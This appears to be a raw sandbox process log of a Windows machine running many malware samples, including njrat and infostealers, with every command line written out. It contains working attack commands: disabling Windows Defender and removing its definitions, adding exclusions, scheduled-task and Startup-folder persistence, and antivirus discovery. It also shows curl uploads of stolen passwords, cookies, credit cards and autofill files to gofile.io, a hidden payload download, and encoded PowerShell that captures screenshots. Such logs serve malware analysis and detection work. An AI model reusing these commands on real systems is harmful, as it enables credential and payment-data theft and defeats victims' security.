C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4280B938C92B6465C2A2438DE9230C00 --mojo-platform-channel-handle=2832 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAUAByAG8AZAB1AGMAdAAuAGUAeABlADsA
C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Dragon Dragon.bat & Dragon.bat
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\c1.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\c1.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Documents\OUCH_SOKHENG.pdf"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x11c,0x12c,0x7ff802cd46f8,0x7ff802cd4708,0x7ff802cd4718
C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 609587
C:\Windows\SysWOW64\findstr.exe
findstr /V "outputdiffswalnutcontainer" Sufficient
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Combine + ..\Transportation + ..\Chef k
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif
Horizon.pif k
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\tmp.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\tmp.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Windows" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Sync360 Sphere Elite Technologies Co\Sync360Sphere.js'" /sc minute /mo 5 /F
C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url" & echo URL="C:\Users\Admin\AppData\Local\Sync360 Sphere Elite Technologies Co\Sync360Sphere.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Windows" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Sync360 Sphere Elite Technologies Co\Sync360Sphere.js'" /sc minute /mo 5 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mode con: cols=125 lines=35
C:\Windows\system32\mode.com
mode con: cols=125 lines=35
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get UUID
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Windows\rundll32.exe
"C:\Windows\rundll32.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_6700_133786559434265760\client.exe
C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe
C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c move Prerequisite Prerequisite.bat & Prerequisite.bat
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\rundll32.exe" "rundll32.exe" ENABLE
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 115839
C:\Windows\SysWOW64\findstr.exe
findstr /V "ISTTRANSACTIONSCONFCOMMENTARY" Grew
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Butter + ..\Community + ..\Efficiently + ..\Tyler + ..\Seas + ..\California + ..\Skip + ..\Publisher + ..\Disappointed + ..\We + ..\Ll + ..\Time + ..\Terrible + ..\Anal + ..\Fleece + ..\Always + ..\Tcp l
C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif
Leaving.pif l
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SYSTEM32\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureCloud Harbor Inc\SafeHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & exit
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
C:\Windows\system32\taskkill.exe
taskkill /im firefox.exe /t /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\48D2.tmp\48D3.tmp\48D4.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6C3ADD092494D81E5030525BA0D8D59B C
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
